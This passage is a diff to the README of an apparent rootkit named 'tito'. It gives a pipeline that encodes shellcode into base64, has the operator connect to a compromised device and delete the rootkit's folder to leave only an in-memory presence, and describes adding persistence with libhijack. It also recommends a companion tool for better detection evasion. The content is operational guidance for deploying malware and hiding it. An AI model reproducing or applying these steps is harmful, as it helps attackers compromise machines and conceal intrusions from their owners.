mephistolist/tito/README.md

 grep '"' shellcode.txt | tr "\n" " " | sed -e 's/\" \"//g;s/\"//g;s/;//g' | base64
 ```

-Then you may run ish with the ip of the device the rootkit was ran on to connect.
+Then you may run ish with the ip of the device the rootkit was ran on to connect and remove the 'tito' folder and any files within it.
+Now you will only have an in memory presence.

 Currently tested on x86_64 Debian Trixie and FreeBSD 14.1

 People from HardenedBSD have reported the shell here will also work with libhijack to add persistance.
 That utility will load a Shared Library in memory making this a complete In-Memory rootkit for BSD if you choose.

 Previously I did not include persistance with Linux as 1. - Persistance would require writing to disk and 2. - Many servers remain up thousands of days without a reboot making it pointless.
 In the optional-persistnace you may now find an additional README file to deploy this feature if you choose.

+Later thoughts: Some of the code in the shell prevented compiling statically.
+For this reason I would now recommend using <a href="https://github.com/mephistolist/hoxha">Hoxha</a> as it allows this and has much better detection evasion.